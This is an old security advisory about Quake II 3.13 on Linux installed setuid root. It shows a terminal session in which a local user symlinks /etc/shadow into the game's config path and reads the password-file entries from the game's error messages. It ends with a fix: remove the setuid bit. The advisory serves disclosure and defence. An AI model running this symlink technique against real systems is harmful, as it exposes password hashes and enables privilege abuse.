COMMAND

    Quake II 3.13 (and lower)

SYSTEMS AFFECTED

    Linux

PROBLEM

    'kevingeo'  posted  following  about  Quake  II.   Vulnerable   is
    everyone  who  followed  the  installation  instructions  and made
    Quake2 setuid root.  Quake2 reads its conf files (and .pak  files)
    before giving up root, and it doesn't check the permissions before
    hand.  Exploit follows:

    nop@chrome:~> id
    uid=501(nop) gid=100(users) groups=100(users)
    nop@chrome:~> mkdir baseq2
    nop@chrome:~> ln -s /etc/shadow baseq2/config.cfg
    nop@chrome:~> ls -l /usr/games/quake/quake2
    -rws--x--x   1 root     root       303444 Feb 24 19:07    /usr/games/quake/quake2
    nop@chrome:~> /usr/games/quake/quake2
    couldn't exec default.cfg
    execing config.cfg
    Unknown command "root:[snip]:10137:0:99999:7:::"
    Unknown command "bin:*:9977:0:99999:7:::"
    Unknown command "daemon:*:9977:0:99999:7:::"
    Unknown command "adm:*:9977:0:99999:7:::"
    Unknown command "lp:*:9977:0:99999:7:::"
    [etc]

SOLUTION

    chmod -s /usr/games/quake/quake2 ; after all, what game got to  do
    on your  server?   If you  still want  to keep  it, create trusted
    groups  until  proper  solution.    There  should  be   Q2-wrapper
    somewhere at Sunsite.